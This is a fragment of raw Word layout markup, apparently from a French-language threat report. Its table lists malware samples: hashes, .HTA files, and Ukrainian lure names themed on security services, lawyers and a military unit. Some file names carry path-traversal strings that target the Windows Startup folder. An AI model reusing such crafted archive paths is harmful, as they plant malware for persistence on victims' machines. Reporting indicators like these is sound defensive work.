                            <a:pt x="1333500" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2828290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="3711575"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="2827655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="2827655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="2827655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="2827655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="2827655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="2827655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="2827655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="2827655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1767840"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="2827655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1767205"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="1767205"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="883920"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1767205"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4705985" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705985" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1334135" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4705350" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1334135" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1333500" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635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260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8893819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="523874"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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523874">
                          <a:moveTo>
                            <a:pt x="2190750" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="52387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523874"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1333500" y="523874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2190115" y="52387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332865" y="523874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4656" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2233930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9418329</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="856615" cy="239395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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6615" cy="239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6615" h="239395">
                          <a:moveTo>
                            <a:pt x="0" y="239395"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="856615" y="239395"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="856615" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="23939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284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1269374</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759450" cy="5293363"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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450" cy="5293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50" h="5293359">
                          <a:moveTo>
                            <a:pt x="6350" y="5293359"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="5293359"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4409439"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="4409439"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3525519"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="3525519"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2465070"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="2465070"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1581149"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="1581149"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="697229"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5753100" y="697229"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="575945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4896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1266199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759450" cy="6536690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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9450" cy="6536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50" h="6536690">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="6536690"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6533515"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759450" y="653351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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2233930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1272549</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="6523990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5239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523990">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="652399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7968" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5605780</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1266199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1047753" cy="6536690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7753" cy="6536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7749" h="6536690">
                          <a:moveTo>
                            <a:pt x="1047749" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1047749" y="6536690"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="6349"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="653034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5136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8893819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5778500" cy="770889"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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770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770889">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="770889"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="767715"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5778500" y="767715"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="527685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="527685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3174"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="577850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7184" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2233930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8900169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="857253" cy="758190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7253" cy="7581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7250" h="758190">
                          <a:moveTo>
                            <a:pt x="857250" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="857250" y="758190"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="75819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8208" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6672579</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8893819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="770889"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7708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770889">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="77088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2304" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2800350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7802889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773430" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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43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43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772795" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772795" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77343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0496" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4359274</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8018789</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1966595" cy="588010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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6595" cy="58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6595" h="588010">
                          <a:moveTo>
                            <a:pt x="0" y="588010"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="388619"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="116840" y="388619"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="116840" y="588010"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1193800" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1193800" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1965960" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1965960" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1193164" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1966595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152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7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254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7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3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2651160" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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11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Cette recherche retourne six échantillons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4592" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5878195</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1277008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="579003" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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5616" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1207135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1363368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="796173" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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1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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5835650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1450363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="664728" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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7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première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7664" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3431539</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1450363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013084" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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8688" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1304290</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1536723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="563668" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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6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9712" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5742305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1623718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="811871" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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8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soumission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07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1968765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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b58e7bddd9d2fcd1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17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2145295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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8e45de593bb100f7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2784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2233560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="419030" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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0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1.hta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3808" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5641340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2240938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="719293" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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2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5 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48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2321825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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32d642d78db6ac1e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58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2498355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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517b55b50a59cf44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2852685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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29849d86f50c01fc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79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3029215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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86d44ea5886a43d2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8928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3117480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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5_18_9_1436_02.01.2026.HTA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9952" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5641340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3124858</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912778" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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7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7 janvier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09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3205745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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8604544596331c06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20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3382275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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12142261f8c1b5db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3024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3736605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1034192" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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41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Адвокатський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40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3824870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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f4779667e4b25efa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507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3913135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3336004" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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600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запит_2_14_8_1836_19.12.2025.pdf:..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7"/>
                            <w:spacing w:val="18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60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4001400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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d85bf3b73699221f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0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4089665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3337972" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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79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_..</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle34"/>
                            <w:spacing w:val="26"/>
                          </w:rPr>
                          <w:t xml:space="preserve">AppData_Roaming_Microsoft_Windows_Start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8144" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5641340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4097043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="835384" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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53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10 avril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91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4177930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7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935bb3377396f25b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019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4266195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3259054" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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90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23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Menu_Programs_Startup</w:t>
                        </w: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.._Startup_2_14_8_183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12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4354460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2f65e2a0fbafebea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2240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4442725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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6_19.12.2025.HTA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32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4797055</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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cb4315c235bbb6ea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42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4973585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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237117ec0f9c9761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531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4973585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2642635" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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26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C:\Users\user\Downloads\357-16230-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6336" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5641340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5069228</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="889588" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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95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24 mars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5150115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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203986297eec145c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8384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5150115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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25_23.10.2025.HTA.crdownload (copy)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94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5326645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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dd87a79816520e21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043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5680975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3261772" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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17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12013150010000889_09.09.2025/Повідомлення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14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5680975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d967f3a32015fde2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2480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5857505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3409999" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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999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щодо затримання співробітника Служби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35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5857505</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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eb3f75f3a741dfdd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4528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5641340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5953148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="967401" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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740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24 février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555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6034035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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безпеки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6576" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5033175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6034035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="651757" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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175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України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6034035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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02e3a9293f4ee4e1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86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6210565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0eff5c664cc9ef82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9648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6210565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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12013150010000889_09.09.2025.HTA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067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6564895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3415442" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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544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Запит на отримання інформації командира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1696" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4878108</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6741425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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А0135_11-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27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6741425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0716db7ad22fc3f0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3744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6741425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2279581" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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958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військової</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="40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5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частини</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="40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4768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6917955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3334683" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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46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967_10.11.2025.pdf:..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.._.._AppData_Ro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57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6917955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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39848f0bd2ea3b8e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6816" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5641340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7013598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912778" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7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 janvier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7094485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
